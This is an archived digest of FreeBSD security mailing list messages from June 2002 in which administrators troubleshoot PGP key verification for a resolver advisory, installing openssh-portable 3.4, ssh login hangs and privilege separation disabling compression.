Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 13:52:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 3FAA237B400 for ; Thu, 27 Jun 2002 13:52:34 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5RKqXDK034171; Thu, 27 Jun 2002 16:52:33 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5RKqXrf034168; Thu, 27 Jun 2002 16:52:33 -0400 (EDT) (envelope-from wollman) Date: Thu, 27 Jun 2002 16:52:33 -0400 (EDT) From: Garrett Wollman Message-Id: <200206272052.g5RKqXrf034168@khavrinen.lcs.mit.edu> To: Amit Chakradeo Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <20020627120425.C91402@ac.wox.org> References: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> <20020627120425.C91402@ac.wox.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 < said: > Is it just me, or is somebody else getting pgp key errors on freebsd > advisories ? Are you sure you have the right key? Perhaps there's something wrong with the key on the keyservers. wollman@khavrinen(2478)$ gpg --edit-key security-officer pub 1024R/73D288A5 created: 1996-04-22 expires: never trust: f/- (1). FreeBSD Security Officer Command> check uid FreeBSD Security Officer [...] sig! 73D288A5 1996-04-22 [self-signature] [...] sig! BEED946E 2000-10-19 Garrett Wollman ; Thu, 27 Jun 2002 13:58:12 -0700 (PDT) Received: from [217.225.204.77] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17NgLA-0003LH-00; Thu, 27 Jun 2002 22:58:08 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 7EDF2226; Thu, 27 Jun 2002 22:58:07 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id D57B96E; Thu, 27 Jun 2002 22:58:01 +0200 (CEST) Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv From: Jan Lentfer To: Garrett Wollman Cc: FreeBSD Security Mailling List In-Reply-To: <200206272052.g5RKqXrf034168@khavrinen.lcs.mit.edu> References: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> <20020627120425.C91402@ac.wox.org> <200206272052.g5RKqXrf034168@khavrinen.lcs.mit.edu> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 27 Jun 2002 22:57:59 +0200 Message-Id: <1025211479.2816.107.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Don, 2002-06-27 um 22.52 schrieb Garrett Wollman: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > < said: > > > Is it just me, or is somebody else getting pgp key errors on freebsd > > advisories ? > > Are you sure you have the right key? Perhaps there's something wrong > with the key on the keyservers. I just imported your key "BEED946E" from blackhole.pca.dfn.de. When I now look at the mail (Evolution) it says "wrong signature". That's the 2nd this happens today. Regards, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 13:59:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.web.de (smtp01.web.de [194.45.170.210]) by hub.freebsd.org (Postfix) with ESMTP id 53CDB37B406 for ; Thu, 27 Jun 2002 13:59:37 -0700 (PDT) Received: from [217.225.204.77] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.70 #5) id 17NgMY-0003kh-00; Thu, 27 Jun 2002 22:59:34 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 808DC226; Thu, 27 Jun 2002 22:59:33 +0200 (CEST) Received: from jan-linux.lan (jan-linux.lan [192.168.0.20]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) with ESMTP id 4D3B36E; Thu, 27 Jun 2002 22:59:28 +0200 (CEST) Subject: Re: Installing openssh-portable 3.4 From: Jan Lentfer To: pjklist@ekahuna.com Cc: FreeBSD Security Mailling List In-Reply-To: <20020627103110488.AAA796@empty1.ekahuna.com@pc02.ekahuna.com> References: <20020627103110488.AAA796@empty1.ekahuna.com@pc02.ekahuna.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7-1mdk Date: 27 Jun 2002 22:59:26 +0200 Message-Id: <1025211566.2815.110.camel@jan-linux.lan> Mime-Version: 1.0 X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Am Don, 2002-06-27 um 12.31 schrieb Philip J. Koenig: > > #cd /usr/ports/security/openssh-portable > #make -DOPENSSH_OVERWRITE_BASE > #make install I used #make -DOPENSSH_OVERWRITE_BASE #make -DOPENSSH_OVERWRITE_BASE install ... and it worked just fine Regards, Jan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 14: 1:22 2002 Delivered-To: freebsd-security@freebsd.org Received: from walter.dfmm.org (walter.dfmm.org [209.151.233.240]) by hub.freebsd.org (Postfix) with ESMTP id B8F3E37B401 for ; Thu, 27 Jun 2002 14:00:47 -0700 (PDT) Received: (qmail 16783 invoked by uid 1000); 27 Jun 2002 21:00:37 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 27 Jun 2002 21:00:37 -0000 Date: Thu, 27 Jun 2002 14:00:37 -0700 (PDT) From: Jason Stone X-X-Sender: To: Subject: Re: resolv and dynamic linking to compat libc In-Reply-To: <20020627124102.V92880-100000@bunning.skiltech.com> Message-ID: <20020627135130.Q5916-100000@walter> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > My version of apache from ports seems to dynamically link libc.so.4, > not statically, which would indicate to me that it would pick up a > rebuild patched libc, and wouldn't need to be rebuilt itself. Of course any already running binaries will need to be restarted to use the new library. You may want to reboot to make sure you get them all. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE9G3z1swXMWWtptckRArTGAKCWU182XdBNX0L7/x1vvPBhR/MSKwCfViWS lfR5I2PykXt1ABf9PXTL1ek= =bF0G -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 14: 4:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 7D5C537B400 for ; Thu, 27 Jun 2002 14:04:49 -0700 (PDT) Received: by peitho.fxp.org (Postfix, from userid 1501) id 8240A136AB; Thu, 27 Jun 2002 17:04:43 -0400 (EDT) Date: Thu, 27 Jun 2002 17:04:43 -0400 From: Chris Faulhaber To: Jan Lentfer Cc: Garrett Wollman , FreeBSD Security Mailling List Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020627210443.GA50696@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , Jan Lentfer , Garrett Wollman , FreeBSD Security Mailling List References: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> <20020627120425.C91402@ac.wox.org> <200206272052.g5RKqXrf034168@khavrinen.lcs.mit.edu> <1025211479.2816.107.camel@jan-linux.lan> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="PNTmBPCT7hxwcZjr" Content-Disposition: inline In-Reply-To: <1025211479.2816.107.camel@jan-linux.lan> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --PNTmBPCT7hxwcZjr Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Jun 27, 2002 at 10:57:59PM +0200, Jan Lentfer wrote: > Am Don, 2002-06-27 um 22.52 schrieb Garrett Wollman: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > >=20 > > < said: > >=20 > > > Is it just me, or is somebody else getting pgp key errors on freebsd > > > advisories ? > >=20 > > Are you sure you have the right key? Perhaps there's something wrong > > with the key on the keyservers. >=20 > I just imported your key "BEED946E" from blackhole.pca.dfn.de. When I > now look at the mail (Evolution) it says "wrong signature". That's the > 2nd this happens today. >=20 Try retrieving a copy from the FreeBSD website/handbook. There are some keyservers that have appear to have corrupt copies of the Security Officer key. --=20 Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --PNTmBPCT7hxwcZjr Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) Comment: FreeBSD: The Power To Serve iD8DBQE9G33qObaG4P6BelARAqUMAJ9gDcYr4do8PJL8DGlC+OzHavWswACfRX6j kkYD2cqX/asdD80dPcX96J0= =PVye -----END PGP SIGNATURE----- --PNTmBPCT7hxwcZjr-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 14: 5: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from ac.wox.org (dsl-64-130-222-85.telocity.com [64.130.222.85]) by hub.freebsd.org (Postfix) with SMTP id 7086C37B408 for ; Thu, 27 Jun 2002 14:05:04 -0700 (PDT) Received: (qmail 76778 invoked by uid 1001); 27 Jun 2002 21:05:04 -0000 Date: Thu, 27 Jun 2002 14:05:03 -0700 From: Amit Chakradeo To: Garrett Wollman Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020627140503.D91402@ac.wox.org> Mail-Followup-To: Garrett Wollman , freebsd-security@freebsd.org References: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> <20020627120425.C91402@ac.wox.org> <200206272052.g5RKqXrf034168@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206272052.g5RKqXrf034168@khavrinen.lcs.mit.edu>; from wollman@lcs.mit.edu on Thu, Jun 27, 2002 at 04:52:33PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 04:52:33PM -0400, Garrett Wollman wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > < said: > > > Is it just me, or is somebody else getting pgp key errors on freebsd > > advisories ? > > Are you sure you have the right key? Perhaps there's something wrong > with the key on the keyservers. > I didn't have the key, but I fetched it from keyserver wwwkeys.us.pgp.net Maybe they haven't updated the public keyserver with latest keys... Amit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 14:14:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [63.167.241.66]) by hub.freebsd.org (Postfix) with ESMTP id 378D337B406 for ; Thu, 27 Jun 2002 14:14:45 -0700 (PDT) Received: (from str@localhost) by giganda.komkon.org (8.11.3/8.11.3) id g5RLEiC86882; Thu, 27 Jun 2002 17:14:44 -0400 (EDT) (envelope-from str) Date: Thu, 27 Jun 2002 17:14:44 -0400 (EDT) From: Igor Roshchin Message-Id: <200206272114.g5RLEiC86882@giganda.komkon.org> To: security@freebsd.org Subject: resolver patch for pre-4.5 OS. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello! I wonder if anybody had any problem with the recommended patch for the resolver problem in libc while using it with systems older then 4.5 ? The patch seems to apply just fine, but I am not sure if there was a significant code change (and at what point), so it could break something else, if applied to an earlier version. I'd appreciate if somebody with the knowledge of that code (and its evolution) can comment on this. Thanks, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 14:16:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from ac.wox.org (dsl-64-130-222-85.telocity.com [64.130.222.85]) by hub.freebsd.org (Postfix) with SMTP id 486AF37B409 for ; Thu, 27 Jun 2002 14:15:56 -0700 (PDT) Received: (qmail 80817 invoked by uid 1001); 27 Jun 2002 21:15:55 -0000 Date: Thu, 27 Jun 2002 14:15:55 -0700 From: freebsd@spam.chakradeo.net To: Chris Faulhaber Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <20020627141555.E91402@ac.wox.org> Mail-Followup-To: Chris Faulhaber , freebsd-security@freebsd.org References: <200206261908.g5QJ8MOE035394@freefall.freebsd.org> <20020627120425.C91402@ac.wox.org> <200206272052.g5RKqXrf034168@khavrinen.lcs.mit.edu> <1025211479.2816.107.camel@jan-linux.lan> <20020627210443.GA50696@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020627210443.GA50696@peitho.fxp.org>; from jedgar@fxp.org on Thu, Jun 27, 2002 at 05:04:43PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 05:04:43PM -0400, Chris Faulhaber wrote: > > Try retrieving a copy from the FreeBSD website/handbook. There > are some keyservers that have appear to have corrupt copies of > the Security Officer key. > Thanks! I just used the pgp key from freebsd website and it does verify now. I also uploaded it to the server that I was using. Amit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 14:53: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id F25EF37B400 for ; Thu, 27 Jun 2002 14:52:54 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 05B375361; Thu, 27 Jun 2002 23:52:50 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "JP Villa (Datafull.com)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Re[2]: openssh OR openssh-portable References: <3D1AD7C4.9020909@cerint.pl> <41256714305.20020627163946@datafull.com> From: Dag-Erling Smorgrav Date: 27 Jun 2002 23:52:49 +0200 In-Reply-To: <41256714305.20020627163946@datafull.com> Message-ID: Lines: 14 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "JP Villa (Datafull.com)" writes: > I think the original question was pointing to this too, > so I rephrase: openssh or openssh-portable? or maybe > openssh 3.4 properly merged on a production codebase? and > in that case, when? In my opinion, the latter is the best option, but it's your machine and your call. Jacques Vidrine has the final word in this matter, and I can't speak for him, but I expect 3.4 will hit -STABLE (and hopefully the security branches) sometime next week. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 15:50:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 9D3E437B400 for ; Thu, 27 Jun 2002 15:50:02 -0700 (PDT) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g5RMoqO13902; Thu, 27 Jun 2002 17:51:05 -0500 (CDT) (envelope-from admin@crimelords.org) Date: Thu, 27 Jun 2002 17:50:52 -0500 (CDT) From: Emacs To: Jan Lentfer Cc: pjklist@ekahuna.com, FreeBSD Security Mailling List Subject: Re: Installing openssh-portable 3.4 In-Reply-To: <1025211566.2815.110.camel@jan-linux.lan> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I did this as well, but my ssh is hanging at login on 2 of my 4 boxes. Any ideas? -emacs On 27 Jun 2002, Jan Lentfer wrote: > Am Don, 2002-06-27 um 12.31 schrieb Philip J. Koenig: > > > > #cd /usr/ports/security/openssh-portable > > #make -DOPENSSH_OVERWRITE_BASE > > #make install > > I used > > #make -DOPENSSH_OVERWRITE_BASE > #make -DOPENSSH_OVERWRITE_BASE install > > ... and it worked just fine > > > Regards, > > Jan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 15:57:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from norton.palomine.net (dsl254-102-179.nyc1.dsl.speakeasy.net [216.254.102.179]) by hub.freebsd.org (Postfix) with SMTP id 6E8A737B400 for ; Thu, 27 Jun 2002 15:57:48 -0700 (PDT) Received: (qmail 70596 invoked by uid 1000); 27 Jun 2002 22:57:47 -0000 Date: Thu, 27 Jun 2002 18:57:47 -0400 From: Chris Johnson To: Emacs Cc: FreeBSD Security Mailling List Subject: Re: Installing openssh-portable 3.4 Message-ID: <20020627225747.GA70498@palomine.net> References: <1025211566.2815.110.camel@jan-linux.lan> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="pWyiEgJYm5f9v55/" Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --pWyiEgJYm5f9v55/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Jun 27, 2002 at 05:50:52PM -0500, Emacs wrote: > I did this as well, but my ssh is hanging at login on 2 of my 4 boxes. > Any ideas? # cp /etc/resolv.conf /usr/local/empty/etc/resolv.conf # chmod 755 /usr/local/empty (If yours is set up with /var/empty instead of /usr/local/empty, make the appropriate change above.) I don't know the implications of having /usr/local/empty with mode 755 instead of 700. Previous versions of the port created it with 755, while the current version creates it with 700. It does solve the problem for me. I also don't know why this step is necessary sometimes and sometimes not. It happened on three of the ten or so boxes I installed openssh-portable-3.4p1 on, and I don't see the rhyme or reason. Chris --pWyiEgJYm5f9v55/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9G5hqPC78Lz4X/PARAqHwAKCqxUEGPfHL6+lB4/VMcqtd2y8rXgCcC1ll 6OMjAIWHBRTDBR5KitqaLpc= =T10s -----END PGP SIGNATURE----- --pWyiEgJYm5f9v55/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 16:44:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id B77FD37B405 for ; Thu, 27 Jun 2002 16:44:33 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5RNiRkk011469 for ; Fri, 28 Jun 2002 11:44:27 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Fri, 28 Jun 2002 11:44:27 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: freebsd-security@freebsd.org Subject: openssh and compression Message-ID: <20020628113815.I2363-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The other day I installed openssh-portable-3.3p1. It ran quite nicely, apparently including privilege separation and compression. that is to say I could see that processes with reduced privileges were being run, and connectionswith 'ssh -v' worked and reported that compression was being used. Now I install openssh-portable-3.4p1 and when I start the daemon it tells me: This platform does not support both privilege separation and compression Compression disabled Is this simply a problem with the way the configuration works itself out, or is there a real problem with supporting compression? Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 16:46:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from home.24cl.com (174.113.sn.ct.dsl.thebiz.net [216.238.113.174]) by hub.freebsd.org (Postfix) with ESMTP id D9D9C37B437 for ; Thu, 27 Jun 2002 16:46:10 -0700 (PDT) Received: from winbloat (winbloat.24cl.home [10.0.1.10]) by home.24cl.com (Postfix) with ESMTP id DBAC42B28A for ; Thu, 27 Jun 2002 19:46:04 -0400 (EDT) Message-ID: <200206271946040965.0030D69F@sentry.24cl.com> In-Reply-To: <20020627225747.GA70498@palomine.net> References: <1025211566.2815.110.camel@jan-linux.lan> <20020627225747.GA70498@palomine.net> X-Mailer: Calypso Version 3.20.01.01 (4) Date: Thu, 27 Jun 2002 19:46:04 -0400 Reply-To: myraq@mgm51.com From: "MikeM" To: freebsd-security@FreeBSD.ORG Subject: Re: Installing openssh-portable 3.4 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 6/27/2002 at 6:57 PM Chris Johnson wrote: >I also don't know why this step is necessary sometimes and sometimes not. >It >happened on three of the ten or so boxes I installed >openssh-portable-3.4p1 on, >and I don't see the rhyme or reason. ============= Could there be a difference in the reverse lookup enablement in the sshd_config files of the different boxen? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 16:58:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from bob.samurai.com (bob.samurai.com [205.207.28.75]) by hub.freebsd.org (Postfix) with ESMTP id D322737B7FB for ; Thu, 27 Jun 2002 16:58:10 -0700 (PDT) Received: from magus (CPE0080C8F30B1D.cpe.net.cable.rogers.com [24.156.229.139]) by bob.samurai.com (Postfix) with ESMTP id 45E631ED1; Thu, 27 Jun 2002 19:58:07 -0400 (EDT) Message-ID: <000601c21e36$897ad130$0300a8c0@anime.ca> From: "William Wong" To: "Andrew McNaughton" , References: <20020628113815.I2363-100000@a2> Subject: Re: openssh and compression Date: Thu, 27 Jun 2002 19:58:29 -0400 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I had this happen too, but it was on a Redhat 6.2 system. I haven't figured out what's causing it though...Odd thing was that 3.3p1 didn't even run properly at least 3.4 does! - Will ----- Original Message ----- From: "Andrew McNaughton" To: Sent: Thursday, June 27, 2002 7:44 PM Subject: openssh and compression > > The other day I installed openssh-portable-3.3p1. It ran quite nicely, > apparently including privilege separation and compression. > > that is to say I could see that processes with reduced privileges were > being run, and connectionswith 'ssh -v' worked and reported that > compression was being used. > > Now I install openssh-portable-3.4p1 and when I start the daemon it tells > me: > > This platform does not support both privilege separation and compression > Compression disabled > > Is this simply a problem with the way the configuration works itself out, > or is there a real problem with supporting compression? > > Andrew McNaughton > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 17: 3: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id 40E0737B433 for ; Thu, 27 Jun 2002 17:01:03 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5RNrLkk011901; Fri, 28 Jun 2002 11:53:22 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Fri, 28 Jun 2002 11:53:21 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: Emacs Cc: Jan Lentfer , , FreeBSD Security Mailling List Subject: Re: Installing openssh-portable 3.4 In-Reply-To: Message-ID: <20020628114927.E2363-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Set 'LogLevel: DEBUG3' in your server config, or start the server with 'sshd -d -d -d'. Then connect with 'ssh -v '. That will give you a lot of dianostic info at both ends - don't forget to turn the extra server logging off when you're done, or your log files may get largish. If you still can't see where it's hanging, bring more specific information back to the list. Andrew McNaughton On Thu, 27 Jun 2002, Emacs wrote: > I did this as well, but my ssh is hanging at login on 2 of my 4 boxes. > Any ideas? > > -emacs > > On 27 Jun 2002, Jan Lentfer wrote: > > > Am Don, 2002-06-27 um 12.31 schrieb Philip J. Koenig: > > > > > > #cd /usr/ports/security/openssh-portable > > > #make -DOPENSSH_OVERWRITE_BASE > > > #make install > > > > I used > > > > #make -DOPENSSH_OVERWRITE_BASE > > #make -DOPENSSH_OVERWRITE_BASE install > > > > ... and it worked just fine To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 17:23:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.webmonster.de (datasink.webmonster.de [194.162.162.209]) by hub.freebsd.org (Postfix) with SMTP id E39EF37B6FA for ; Thu, 27 Jun 2002 17:21:17 -0700 (PDT) Received: (qmail 57598 invoked by uid 1000); 28 Jun 2002 00:12:21 -0000 Date: Fri, 28 Jun 2002 02:12:21 +0200 From: "Karsten W. Rohrbach" To: veedee@c7.campus.utcluj.ro Cc: security@freebsd.org Subject: Re: Time to look put more resources into FreeSSH ? Message-ID: <20020628021221.A57287@mail.webmonster.de> Mail-Followup-To: "Karsten W. Rohrbach" , veedee@c7.campus.utcluj.ro, security@freebsd.org References: <200206250632.QAA02400@caligula.anu.edu.au> <20020625004019.W5916-100000@walter> <20020625112246.A30267@c7.campus.utcluj.ro> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="AqsLC8rIMeq19msA" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020625112246.A30267@c7.campus.utcluj.ro>; from veedee@c7.campus.utcluj.ro on Tue, Jun 25, 2002 at 11:22:46AM +0300 X-Arbitrary-Number-Of-The-Day: 42 X-URL: http://www.webmonster.de/ X-Disclaimer: My opinions do not necessarily represent those of my employer Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --AqsLC8rIMeq19msA Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable veedee@c7.campus.utcluj.ro(veedee@c7.campus.utcluj.ro)@2002.06.25 11:22:46 = +0000: > # uname 